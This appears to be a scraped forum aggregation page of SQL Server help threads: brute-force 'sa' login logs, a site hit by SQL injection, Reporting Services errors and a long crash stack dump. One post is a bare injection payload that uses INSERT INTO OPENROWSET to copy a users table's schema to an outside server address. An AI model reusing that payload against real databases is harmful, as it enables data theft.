Possible Attempted SQL Hack
Oct 4, 2007
I have SQL 2005 Express on a hosted webserver - the server is behind a provided firewall with port 1433 closed.
In my event log I am getting hundreds of these :
Login failed for user 'sa'. [CLIENT: 213.247.51.248]
Event ID 18456
They come thick and fast from the same IP.
When I look in SQL Error Logs it's State 8 which seems to be invalid password - so it looks like someone probing the server to me.
I can see a way in the firewall to block certain IP's.
Anyone know a way I can lockdown the SQL, or the server (Packet Filtering?) to stop this? The server is hosted by 1&1 who aren't that hot with support on stuff like this.
Any help greatly appreciated!!
View 9 Replies
ADVERTISEMENT
Apr 21, 2008
Hi All,
I am getting alot of logged events from loads of different IP's as seen below. Majority are trying the sa account.. a few trying 'admin' which doesnt exist anyway. But how are they getting through my firewall to actually get to this point? What am i not blocking? Using SQL Server 2005 on a win2003 server. Commodo firewall software.
Any help is appriciated!
2008-04-15 19:47:51.08 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:47:51.08 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:47:54.54 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:47:54.54 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:00.63 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:00.63 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:17.38 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:17.38 Logon Login failed for user 'sa'. [CLIENT: 211.144.156.192]
2008-04-15 19:48:36.83 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:36.83 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:40.27 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:40.27 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:43.72 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:43.72 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:50.18 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:50.18 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:53.58 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:53.58 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:56.02 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:56.02 Logon Login failed for user 'sa'. [CLIENT: 211.144.156.192]
2008-04-15 19:48:57.00 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:57.00 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:48:59.67 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:59.67 Logon Login failed for user 'sa'. [CLIENT: 211.144.156.192]
2008-04-15 19:48:59.75 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:48:59.75 Logon Login failed for user 'sa'. [CLIENT: 211.144.156.192]
2008-04-15 19:49:03.46 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:03.46 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:49:06.94 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:06.94 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:49:13.58 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:13.58 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:49:19.00 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:19.00 Logon Login failed for user 'sa'. [CLIENT: 211.144.156.192]
2008-04-15 19:49:19.96 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:19.96 Logon Login failed for user 'sa'. [CLIENT: 218.65.238.84]
2008-04-15 19:49:20.08 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:20.08 Logon Login failed for user 'sa'. [CLIENT: 219.129.239.211]
2008-04-15 19:49:20.19 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:20.19 Logon Login failed for user 'sa'. [CLIENT: 219.129.239.211]
2008-04-15 19:49:20.38 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:20.38 Logon Login failed for user 'sa'. [CLIENT: 219.129.239.211]
2008-04-15 19:49:20.39 Logon Error: 18456, Severity: 14, State: 8.
2008-04-15 19:49:20.39 Logon Login failed for user 'sa'. [CLIENT: 219.129.239.211]
View 2 Replies
View Related
Nov 27, 2006
I'm getting dozens of attempts per minute on my SA account for SQL Server 2000. The systematic nature of it makes me think a script kiddie is doing this - and has been doing this all weekend. I'm not worried about him ever guessing the password, but I would like to use my firewall to block his IP address.
Is there any way to get the IP addy of someone trying to log into my SQL server?
View 1 Replies
View Related
Oct 18, 2006
INSERT INTO OPENROWSET ('SQLOLEDB','UID=as) <INSERT INTO OPENROWSET ('SQLOLEDB','UID=as)>; PWD= <PWD=>; NETWORK=DBMSSOCN <NETWORK=DBMSSOCN>; ADDRESS=111.22.333.44 <ADDRESS=111.22.333.44>; 1433 <1433>; ' <'>; 'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION <'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION>; --sp_useradmin <--sp_useradmin>
View 3 Replies
View Related
Dec 31, 2007
This morning I found that during the night someone hacked into my remote hosted SQL server 2005 database. Every record in a description field in each of three tables had everything after the first sentence replaced with the same URL. The three pages that used these tables badly infected anyone who viewed them in IE.I had my host restore the 12/30 backup, and I changed all the database and ftp passwords, now I want to be sure my code isn't giving anyone access. I'm using strongly typed datasets. This is my code behind code.Dim sCategory = Request.QueryString("cat")Dim ResourceAdapter As New ResourcesTableAdapters.ResourcesTableAdapterDim dF As Data.DataTable = ResourceAdapter.GetDataByCategory(sCategory)Dim numRows = dF.Rows.CountLabelCat.Text = sCategoryRepeater1.DataSource = dFRepeater1.DataBind() Is there anything I can do to better secure this? Oh, my connect string is in the web.config file only, but it isn't encrypted. I will be encrypting it today.Diane
View 9 Replies
View Related
Dec 19, 2007
This works:
http://blogs.msdn.com/chrishays/archive/2006/09/27/ContinuedHeader.aspx
but not when exporting to PDF.
Does anyone know of a workaround?
View 1 Replies
View Related
Aug 24, 2006
I guess this is a fairly common topic but couldn't find the right words to find anything in a search.
What I'm getting at, is there any tsql functions or combination of commands for the following.
You have identity columns in your tables, if you set the a seed and autoincrement, I enter in rows 1 -10 and then I delete 4, 6, 7, 8.
My next new record uses 11. Is there any logic that allows you to check and reuse 4, 6, 7 & 8 described above? Not looking for something that consists of having to create an extra ID table for each table and handle configuring what the next available number is everytime an Insert or delete is called.
Thanks.
View 4 Replies
View Related
Jan 4, 2006
hi,
i had this formula written for a textbox in a table, but yet still encounter the following error:
expression:
=iif(countdistinct(Fields!room.Value)=0,0, sum(Fields!rate.Value)/countdistinct(Fields!room.Value))
error:
attempted to divide by zero.
any way i can solve this problem?
thanks!
View 12 Replies
View Related
Jul 23, 2005
I have the security audit logging failed attempts on my MS SQL server.Is there a way to log the ip address of these attempts?
View 1 Replies
View Related
Nov 24, 2004
It is not uncommon for me to review the event logs of our SQL Server and notice that someone is attempting to figure out the password for one of the SQL user accounts.........especially the "sa" username. But lately our SQL server has to be rebooted to where it is starting to become a nightly thing.
Last night the SQL Server was bombarded with attempted failed connections for 2 hours before it finally gave a blank BSOD. The SQL Server in question is in mixed mode and is a shared server. Strictly using Windows Authentication mode is not an option for us. The server has "beefy" hardware and has all updates and patches.
Sometimes, when I log on the server and notice that an IP address is making such attacks on the server, I put up an IPSEC policy against that IP. But that is not a good solution for reasons I dont think need to be outlined here.
So my question is, what can I do to better protect our SQL Server from these types of attacks? My thought on these attacks is not different than a DDOS that eventually takes the server down.
I have already done TCP/IP Hardening but not sure what else to do.
Thank you all for your replies.
View 3 Replies
View Related
Jan 15, 2008
Hi All, I have a web form that inserts information into two tables in sql 2005 database on a submit button click. I have a unique key on the tables preventing duplicate information which works fine. The problem I have is that at the minute if a users tries to insert a duplicate row they just get the built in sql error message. Is there a way I can validate the information before if goes into the database and display perhaps a label telling the user of their error or is there a way I can customize the build in sql error message? I've had a search on various forums and sites and can't find any info that would help me. Thanks in advance
Dave
View 6 Replies
View Related
Nov 23, 2005
One of the packages we've created a while ago is now, suddenly, giving us a strange error:
View 3 Replies
View Related
May 23, 2007
we are using sql server 2005 standard edition with sp1
From last couple of days, I am getting lot of these errors-
Process 304 unlocking unowned resource: OBJECT: 2:792809934:0
Process ID 304 attempted to unlock a resource it does not own: OBJECT: 2:792809934:0 . Retry the transaction, because this error may be caused by a timing condition. If the problem persists, contact the database administrator.
A user request from the session with SPID 304 generated a fatal exception. SQL Server is terminating this session. Contact Product Support Services with the dump produced in the log directory.
SqlDumpExceptionHandler: Process 304 generated fatal exception c0000005 EXCEPTION_ACCESS_VIOLATION. SQL Server is terminating this process.
2007-05-23 05:31:58.74 spid76 * *******************************************************************************
2007-05-23 05:31:58.74 spid76 *
2007-05-23 05:31:58.74 spid76 * BEGIN STACK DUMP:
2007-05-23 05:31:58.74 spid76 * 05/23/07 05:31:58 spid 76
2007-05-23 05:31:58.74 spid76 *
2007-05-23 05:31:58.74 spid76 *
2007-05-23 05:31:58.74 spid76 * Exception Address = 00000000015F4502 Module(sqlservr+00000000005F4502)
2007-05-23 05:31:58.74 spid76 * Exception Code = c0000005 EXCEPTION_ACCESS_VIOLATION
2007-05-23 05:31:58.74 spid76 * Access Violation occurred reading address 0000000000000018
2007-05-23 05:31:58.74 spid76 * Input Buffer 68 bytes -
2007-05-23 05:31:58.74 spid76 * 16 00 00 00 12 00 00 00 02 00 00 00 00 00 00 00 00 00
2007-05-23 05:31:58.74 spid76 * S G L M e s 01 00 00 00 15 00 53 00 47 00 4c 00 4d 00 65 00 73 00
2007-05-23 05:31:58.74 spid76 * s a g e Q u e u e 73 00 61 00 67 00 65 00 51 00 75 00 65 00 75 00 65 00
2007-05-23 05:31:58.74 spid76 * S e l e c t 53 00 65 00 6c 00 65 00 63 00 74 00 00 00
2007-05-23 05:31:58.74 spid76 *
2007-05-23 05:31:58.74 spid76 *
2007-05-23 05:31:58.74 spid76 * MODULE BASE END SIZE
2007-05-23 05:31:58.74 spid76 * sqlservr 0000000001000000 00000000035FBFFF 025fc000
2007-05-23 05:31:58.74 spid76 * ntdll 0000000078EC0000 0000000078FF8FFF 00139000
2007-05-23 05:31:58.74 spid76 * kernel32 0000000078D40000 0000000078EB1FFF 00172000
2007-05-23 05:31:58.74 spid76 * MSVCR80 0000000078130000 00000000781FEFFF 000cf000
2007-05-23 05:31:58.74 spid76 * msvcrt 000007FF7FC00000 000007FF7FC85FFF 00086000
2007-05-23 05:31:58.74 spid76 * MSVCP80 000000007C420000 000000007C530FFF 00111000
2007-05-23 05:31:58.74 spid76 * ADVAPI32 000007FF7FEE0000 000007FF7FFE4FFF 00105000
2007-05-23 05:31:58.74 spid76 * RPCRT4 000007FF7FD30000 000007FF7FED8FFF 001a9000
2007-05-23 05:31:58.74 spid76 * USER32 0000000078C30000 0000000078D3BFFF 0010c000
2007-05-23 05:31:58.74 spid76 * GDI32 000007FF7FC90000 000007FF7FD28FFF 00099000
2007-05-23 05:31:58.74 spid76 * CRYPT32 000007FF7D180000 000007FF7D2DEFFF 0015f000
2007-05-23 05:31:58.74 spid76 * MSASN1 000007FF7D150000 000007FF7D179FFF 0002a000
2007-05-23 05:31:58.74 spid76 * Secur32 000007FF7E7F0000 000007FF7E811FFF 00022000
2007-05-23 05:31:58.74 spid76 * MSWSOCK 000007FF76FE0000 000007FF7705BFFF 0007c000
2007-05-23 05:31:58.74 spid76 * WS2_32 000007FF77150000 000007FF7717FFFF 00030000
2007-05-23 05:31:58.74 spid76 * WS2HELP 000007FF77140000 000007FF7714BFFF 0000c000
2007-05-23 05:31:58.74 spid76 * USERENV 000007FF7C4A0000 000007FF7C5A8FFF 00109000
2007-05-23 05:31:58.74 spid76 * opends60 00000000333E0000 00000000333E7FFF 00008000
2007-05-23 05:31:58.74 spid76 * NETAPI32 000007FF771B0000 000007FF77247FFF 00098000
2007-05-23 05:31:58.74 spid76 * SHELL32 000007FF7F190000 000007FF7FB97FFF 00a08000
2007-05-23 05:31:58.74 spid76 * SHLWAPI 000007FF7EF60000 000007FF7EFFAFFF 0009b000
2007-05-23 05:31:58.74 spid76 * comctl32 0000000000AF0000 0000000000C76FFF 00187000
2007-05-23 05:31:58.74 spid76 * psapi 000007FF7E1B0000 000007FF7E1BFFFF 00010000
2007-05-23 05:31:58.74 spid76 * instapi 0000000048060000 000000004806CFFF 0000d000
2007-05-23 05:31:58.74 spid76 * CLUSAPI 000007FF7B1C0000 000007FF7B1E3FFF 00024000
2007-05-23 05:31:58.74 spid76 * ole32 000007FF7ECE0000 000007FF7EF51FFF 00272000
2007-05-23 05:31:58.74 spid76 * OLEAUT32 000007FF7E9F0000 000007FF7EB03FFF 00114000
2007-05-23 05:31:58.74 spid76 * RESUTILS 000007FF7B310000 000007FF7B32BFFF 0001c000
2007-05-23 05:31:58.74 spid76 * sqlevn70 000000004F610000 000000004F7A3FFF 00194000
2007-05-23 05:31:58.74 spid76 * SQLOS 00000000344D0000 00000000344D5FFF 00006000
2007-05-23 05:31:58.74 spid76 * NTMARTA 000007FF7E2F0000 000007FF7E32BFFF 0003c000
2007-05-23 05:31:58.74 spid76 * SAMLIB 000007FF76F80000 000007FF76F95FFF 00016000
2007-05-23 05:31:58.74 spid76 * WLDAP32 000007FF7E780000 000007FF7E7E5FFF 00066000
2007-05-23 05:31:58.74 spid76 * rsaenh 000000000FFB0000 000000000FFEDFFF 0003e000
2007-05-23 05:31:58.74 spid76 * AUTHZ 000007FF7E2C0000 000007FF7E2ECFFF 0002d000
2007-05-23 05:31:58.74 spid76 * MSCOREE 000006427EE60000 000006427EED3FFF 00074000
2007-05-23 05:31:58.75 spid76 * msv1_0 000007FF7E330000 000007FF7E373FFF 00044000
2007-05-23 05:31:58.75 spid76 * iphlpapi 000007FF57250000 000007FF57280FFF 00031000
2007-05-23 05:31:58.75 spid76 * kerberos 000007FF77410000 000007FF774C2FFF 000b3000
2007-05-23 05:31:58.75 spid76 * cryptdll 000007FF7DAB0000 000007FF7DABEFFF 0000f000
2007-05-23 05:31:58.75 spid76 * schannel 000007FF7DB70000 000007FF7DBB0FFF 00041000
2007-05-23 05:31:58.75 spid76 * COMRES 000007FF7E920000 000007FF7E9E5FFF 000c6000
2007-05-23 05:31:58.75 spid76 * XOLEHLP 000007FF5C560000 000007FF5C566FFF 00007000
2007-05-23 05:31:58.75 spid76 * MSDTCPRX 000007FF67140000 000007FF67210FFF 000d1000
2007-05-23 05:31:58.75 spid76 * msvcp60 000000000AD30000 000000000AE19FFF 000ea000
2007-05-23 05:31:58.75 spid76 * MTXCLU 000007FF7B540000 000007FF7B569FFF 0002a000
2007-05-23 05:31:58.75 spid76 * VERSION 000007FF7FBF0000 000007FF7FBFAFFF 0000b000
2007-05-23 05:31:58.75 spid76 * WSOCK32 000007FF770F0000 000007FF770F9FFF 0000a000
2007-05-23 05:31:58.75 spid76 * DNSAPI 000007FF7E720000 000007FF7E76DFFF 0004e000
2007-05-23 05:31:58.75 spid76 * winrnr 000007FF7E820000 000007FF7E82AFFF 0000b000
2007-05-23 05:31:58.75 spid76 * rasadhlp 000007FF7E830000 000007FF7E836FFF 00007000
2007-05-23 05:31:58.75 spid76 * hnetcfg 000007FF6D1F0000 000007FF6D280FFF 00091000
2007-05-23 05:31:58.75 spid76 * wshtcpip 000007FF76FA0000 000007FF76FAAFFF 0000b000
2007-05-23 05:31:58.75 spid76 * security 000007FF77530000 000007FF77534FFF 00005000
2007-05-23 05:31:58.75 spid76 * msfte 0000000049980000 0000000049D2DFFF 003ae000
2007-05-23 05:31:58.75 spid76 * dbghelp 000000000D7F0000 000000000D949FFF 0015a000
2007-05-23 05:31:58.75 spid76 * WINTRUST 000007FF7E210000 000007FF7E25DFFF 0004e000
2007-05-23 05:31:58.75 spid76 * imagehlp 000007FF7E2A0000 000007FF7E2B2FFF 00013000
2007-05-23 05:31:58.75 spid76 * dssenh 000000000FF70000 000000000FFABFFF 0003c000
2007-05-23 05:31:58.75 spid76 * ntdsapi 000007FF7DAD0000 000007FF7DAF3FFF 00024000
2007-05-23 05:31:58.75 spid76 * xpsp2res 000007FF5C210000 000007FF5C4D6FFF 002c7000
2007-05-23 05:31:58.75 spid76 * CLBCatQ 0000000003600000 00000000036DDFFF 000de000
2007-05-23 05:31:58.75 spid76 * sqlncli 00000000337A0000 0000000033A5DFFF 002be000
2007-05-23 05:31:58.75 spid76 * COMCTL32 0000000003700000 00000000037EDFFF 000ee000
2007-05-23 05:31:58.75 spid76 * comdlg32 000007FF7D360000 000007FF7D3D6FFF 00077000
2007-05-23 05:31:58.75 spid76 * SQLNCLIR 0000000035000000 0000000035032FFF 00033000
2007-05-23 05:31:58.75 spid76 * msftepxy 000000000F130000 000000000F150FFF 00021000
2007-05-23 05:31:58.75 spid76 * xpstar90 0000000053C30000 0000000053CB4FFF 00085000
2007-05-23 05:31:58.75 spid76 * SQLSCM90 0000000053AD0000 0000000053ADBFFF 0000c000
2007-05-23 05:31:58.75 spid76 * ODBC32 000007FF63EB0000 000007FF63F16FFF 00067000
2007-05-23 05:31:58.75 spid76 * BatchParser90 00000000520C0000 00000000520ECFFF 0002d000
2007-05-23 05:31:58.75 spid76 * ATL80 000000007C630000 000000007C64DFFF 0001e000
2007-05-23 05:31:58.75 spid76 * odbcint 000007FF63DC0000 000007FF63DD7FFF 00018000
2007-05-23 05:31:58.75 spid76 * xpstar90 0000000010CC0000 0000000010CE5FFF 00026000
2007-05-23 05:31:58.75 spid76 * msxmlsql 0000000078800000 0000000078963FFF 00164000
2007-05-23 05:31:58.75 spid76 * msxml3 000007FF78A20000 000007FF78C2DFFF 0020e000
2007-05-23 05:31:58.75 spid76 * xpsqlbot 000000004A7C0000 000000004A7C7FFF 00008000
2007-05-23 05:31:58.75 spid76 * xplog70 0000000034730000 000000003473FFFF 00010000
2007-05-23 05:31:58.75 spid76 * xplog70 00000000125B0000 00000000125B2FFF 00003000
2007-05-23 05:31:58.75 spid76 *
2007-05-23 05:31:58.75 spid76 * P1Home: FFFFFADEC275F600:
2007-05-23 05:31:58.75 spid76 * P2Home: 0000000017F4DEA0: FFFFFADEC275F600 0000000017F4DEA0 0000000000000000 0000000017F4E660 0000800000000000 FFFFFADEC275F940
2007-05-23 05:31:58.75 spid76 * P3Home: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * P4Home: 0000000017F4E660: FFFFFFFF00000001 0000000000000000 0000000100ECCEA8 0000000100ECCF60 0000000000000000 00000000E226E9C0
2007-05-23 05:31:58.75 spid76 * P5Home: 0000800000000000:
2007-05-23 05:31:58.75 spid76 * P6Home: FFFFFADEC275F940:
2007-05-23 05:31:58.75 spid76 * ContextFlags: 000000000010001F:
2007-05-23 05:31:58.75 spid76 * MxCsr: 0000000000001FA0:
2007-05-23 05:31:58.75 spid76 * SegCs: 0000000000000033:
2007-05-23 05:31:58.75 spid76 * SegDs: 000000000000002B:
2007-05-23 05:31:58.75 spid76 * SegEs: 000000000000002B:
2007-05-23 05:31:58.75 spid76 * SegFs: 0000000000000053:
2007-05-23 05:31:58.75 spid76 * SegGs: 000000000000002B:
2007-05-23 05:31:58.75 spid76 * SegSs: 000000000000002B:
2007-05-23 05:31:58.75 spid76 * EFlags: 0000000000010202: 0065002E0064006D 0046000000650078 004F004E005F0050 0053004F0048005F 00480043005F0054 003D004B00430045
2007-05-23 05:31:58.75 spid76 * Rax: 0000000100ECCF60: 0000000000000000 0000000100ECCEA8 0000000000000000 0065006300630041 0000000000000000 0000000000000000
2007-05-23 05:31:58.75 spid76 * Rcx: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * Rdx: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * Rbx: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * Rsp: 0000000017F4E440: 0000000001B30DC0 FFFFFFFFFF000000 0000000000000000 0000000078D6E31C 00000000D44421C0 00000000015E8750
2007-05-23 05:31:58.75 spid76 * Rbp: 0000000017F4E660: FFFFFFFF00000001 0000000000000000 0000000100ECCEA8 0000000100ECCF60 0000000000000000 00000000E226E9C0
2007-05-23 05:31:58.75 spid76 * Rsi: 0000000273C15900: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000
2007-05-23 05:31:58.75 spid76 * Rdi: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * R8: 00000000D44421C0: 0000000000000000 0000000000000000 00000000D039C1D0 00000000E892C1D0 0000000000000001 00000000038203A0
2007-05-23 05:31:58.75 spid76 * R9: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * R10: 0000000001000000: 0000000300905A4D 0000FFFF00000004 00000000000000B8 0000000000000040 0000000000000000 0000000000000000
2007-05-23 05:31:58.75 spid76 * R11: 0000000017F4E5C8: 00000000015E5847 00000000063C8080 00000000063C8130 0000000192CED0F0 0000000001541382 FFFFFFFFFFFF0002
2007-05-23 05:31:58.75 spid76 * R12: 0000000017F4E608: 00000000063C4C58 0000000000000000 0000000000000000 00000000000002AA 0000000017F4E890 0000000100ECCE70
2007-05-23 05:31:58.75 spid76 * R13: 0000000000000001:
2007-05-23 05:31:58.75 spid76 * R14: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * R15: 0000000000000000:
2007-05-23 05:31:58.75 spid76 * Rip: 00000000015F4502: 086F8B4C187A8B48 C1F6434FB60F2074 44004E814E850F02 0F04C1F660244C89 4C894C004E815985 30250C8B48657824
2007-05-23 05:31:58.75 spid76 * *******************************************************************************
2007-05-23 05:31:58.75 spid76 * -------------------------------------------------------------------------------
2007-05-23 05:31:58.75 spid76 * Short Stack Dump
2007-05-23 05:31:58.75 spid76 00000000015F4502 Module(sqlservr+00000000005F4502)
2007-05-23 05:31:58.75 spid76 00000000015E5847 Module(sqlservr+00000000005E5847)
2007-05-23 05:31:58.75 spid76 000000000158A7CE Module(sqlservr+000000000058A7CE)
2007-05-23 05:31:58.75 spid76 00000000024796E7 Module(sqlservr+00000000014796E7)
2007-05-23 05:31:58.75 spid76 000000000247A0E5 Module(sqlservr+000000000147A0E5)
2007-05-23 05:31:58.75 spid76 0000000001A2F32F Module(sqlservr+0000000000A2F32F)
2007-05-23 05:31:58.75 spid76 0000000001625988 Module(sqlservr+0000000000625988)
2007-05-23 05:31:58.75 spid76 0000000001736E0B Module(sqlservr+0000000000736E0B)
2007-05-23 05:31:58.75 spid76 000000000161BC5B Module(sqlservr+000000000061BC5B)
2007-05-23 05:31:58.75 spid76 00000000016126D1 Module(sqlservr+00000000006126D1)
2007-05-23 05:31:58.75 spid76 0000000001614BB6 Module(sqlservr+0000000000614BB6)
2007-05-23 05:31:58.75 spid76 000000000268C3CA Module(sqlservr+000000000168C3CA)
2007-05-23 05:31:58.75 spid76 000000000268DCB4 Module(sqlservr+000000000168DCB4)
2007-05-23 05:31:58.75 spid76 000000000161FC5E Module(sqlservr+000000000061FC5E)
2007-05-23 05:31:58.75 spid76 00000000015C80E8 Module(sqlservr+00000000005C80E8)
2007-05-23 05:31:58.75 spid76 00000000015CAD6D Module(sqlservr+00000000005CAD6D)
2007-05-23 05:31:58.75 spid76 00000000015E0232 Module(sqlservr+00000000005E0232)
2007-05-23 05:31:58.75 spid76 00000000015DE73E Module(sqlservr+00000000005DE73E)
2007-05-23 05:31:58.75 spid76 00000000015D66CE Module(sqlservr+00000000005D66CE)
2007-05-23 05:31:58.75 spid76 00000000015D7129 Module(sqlservr+00000000005D7129)
2007-05-23 05:31:58.75 spid76 00000000015CE674 Module(sqlservr+00000000005CE674)
2007-05-23 05:31:58.75 spid76 00000000014CE4C7 Module(sqlservr+00000000004CE4C7)
2007-05-23 05:31:58.75 spid76 00000000017A0B89 Module(sqlservr+00000000007A0B89)
2007-05-23 05:31:58.75 spid76 0000000001785C90 Module(sqlservr+0000000000785C90)
2007-05-23 05:31:58.75 spid76 00000000017D08F8 Module(sqlservr+00000000007D08F8)
2007-05-23 05:31:58.75 spid76 00000000781337A7 Module(MSVCR80+00000000000037A7)
2007-05-23 05:31:58.77 spid76 0000000078133864 Module(MSVCR80+0000000000003864)
2007-05-23 05:31:58.77 spid76 0000000078D6B66A Module(kernel32+000000000002B66A)
Can anyone help me these errors? Why I am getting these errors ? And how do i resolve this issue?
Thanks
View 1 Replies
View Related
Aug 22, 2007
Hi,
I am back with one more problem..
I have created few reports using SSRS 2005. I am using Oracle database in Data Source to fetch my data. It is working fine and showing me report correctly. But after running the report 8 to 10 times, it starts giving me Memory error. To get rid of that, I need to recycle (stop-start) ReportingService from IIS.
I am exactly getting following error...
Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
I am not getting the actual problem, why is it giving memory error only after running few times? Please let me know if anyone facing same problem or knowing the solution for the problem.
Thanks,
HMaheta
View 3 Replies
View Related
Sep 29, 2009
I'm trying to install SQL Server 2008 on a virtual machine with Windows 2008 R2. Setup fails with the error "Attempted to perform an unauthorized operation". Looking at the installation log, I see these details:
2009-09-29 08:24:49 SQLBrowser: sRegLocation = 'SOFTWAREMicrosoftMicrosoft SQL Server', regView = 'Wow6432', sSddl = '(A;CI;KR;;;[SQLServer2005SQLBrowserUser$ITISFIM])', bOptional = 'False'.
2009-09-29 08:24:49 Slp: Sco: Attempting to create base registry key HKEY_LOCAL_MACHINE, machine
[code]....
View 35 Replies
View Related
Mar 12, 2015
I have created a Dynamic Merge statement SCD2 Store procedure , which insert the records if no matches and if bbxkey matches from source table to destination table thne it updates old record as lateteverion 0 and insert new record with latest version 1.
I am getting below error when I ahve more than 1 bbxkey in my source table. How can I ignore this.
BBXkey is nothing but I am deriving by combining 2 columns.
Msg 8672, Level 16, State 1, Line 6
The MERGE statement attempted to UPDATE or DELETE the same row more than once. This happens when a target row matches more than one source row. A MERGE statement cannot UPDATE/DELETE the same row of the target table multiple times. Refine the ON clause to ensure a target row matches at most one source row, or use the GROUP BY clause to group the source rows.
View 4 Replies
View Related
Jun 13, 2007
Hi all,
The shotshot agent is generating a snapshot, I got the error ' Attempted to read or write protected memory. This is often an indication that other memory is corrupt'. Then, the agent failed. I tried to restart the agent and generate a snapshot again. This time, it run normally. So far, I got this error twice since the replication launched. Kindly advise. Thanks a lot.
View 4 Replies
View Related
Mar 17, 2006
I'm trying to import data from a Sybase ASE 12.0 database called "OurTestDatabase" into MS SQL Server 2005. I started SSIS Wizard and indicated "Sybase ASE OLEDB Provider" as a source and SQL Native Client as the target. I'm gettign the following error message:
-----------------------------------------------------------------------------------------------------------------
Cannot get supported data types from the database connection
"Provider=Sybase.ASEOLDEDBProvider;Password=;Persist Security Info=True;User ID=sa;Data Source=sybase;Initial Catalog=OurTestDatabase"
Additional information
|_ Attempted to read or write protected memory. This is often an indication that other memory is corrupt. (System.Data)
-----------------------------------------------------------------------------------------------------------------
The same data source worked with DTS when we thought we'd convert to MS SQL Server 2000. Is this a bug in SSIS? What can be done? Using ".Net Framework Provider for ODBC" is not a good option because this doesn't allow me to choose any tables from the Sybase source.
Any help is greatly appreciated.
View 7 Replies
View Related
Sep 29, 2015
We have a large number of SSISDB packages running happily, connecting to our SQL Servers using ADO.Net or Sql Native Client, making their connection using NTLM. (We don't have our SQL Server SPNs correctly configured to support Kerberos).
The SSISDB packages are hosted on and run on a dedicated SQL server, different to the SQL Servers they are connecting to.
Very occasionally, the connection attempt is made using Kerberos instead of NTLM, and the connection attempt to sql server fails. (This is going by the Windows Security event log, which reveals a Kerberos login - a successful one at the Windows level - at the precise time that the calling agent job is informed of a connection timeout and fails, approx 23 seconds after the job starts).
The correct configuration of our SPNs is something we may wish to look into for security best practice, and would of course fix this. However, that may not be my decision to make.
View 2 Replies
View Related
Jun 19, 2007
Our server is 64 bits OS. After SQL instalation we try to load the Reports web site and the server return the following error, can anyone help us?:
Attempted to load a 64-bit assembly on a 32-bit platform. Use ReflectionOnlyLoad() instead if trying to load for reflection purposes.Server
Error in '/Reports' Application.
Attempted to load a 64-bit assembly on a 32-bit platform. Use
ReflectionOnlyLoad() instead if trying to load for reflection purposes.
Description: An unhandled exception occurred during the execution of the current
web request. Please review the stack trace for more information about the error
and where it originated in the code.
Exception Details: System.BadImageFormatException: Attempted to load a 64-bit
assembly on a 32-bit platform. Use ReflectionOnlyLoad() instead if trying to
load for reflection purposes.
Source Error:
An unhandled exception was generated during the execution of the current
web request. Information regarding the origin and location of the
exception can be identified using the exception stack trace below.
Stack Trace:
[BadImageFormatException: Attempted to load a 64-bit assembly on a 32-bit platform. Use ReflectionOnlyLoad() instead if trying to load for reflection purposes.]
System.Reflection.Assembly.nLoad(AssemblyName fileName, String codeBase, Evidence assemblySecurity, Assembly locationHint, StackCrawlMark& stackMark, Boolean throwOnFileNotFound, Boolean forIntrospection) +0
System.Reflection.Assembly.InternalLoad(AssemblyName assemblyRef, Evidence assemblySecurity, StackCrawlMark& stackMark, Boolean forIntrospection) +211
System.Reflection.Assembly.InternalLoad(String assemblyString, Evidence assemblySecurity, StackCrawlMark& stackMark, Boolean forIntrospection) +141
System.Reflection.Assembly.Load(String assemblyString) +25
System.Web.Configuration.CompilationSection.LoadAssemblyHelper(String assemblyName, Boolean starDirective) +32
[ConfigurationErrorsException: Attempted to load a 64-bit assembly on a 32-bit platform. Use ReflectionOnlyLoad() instead if trying to load for reflection purposes.]
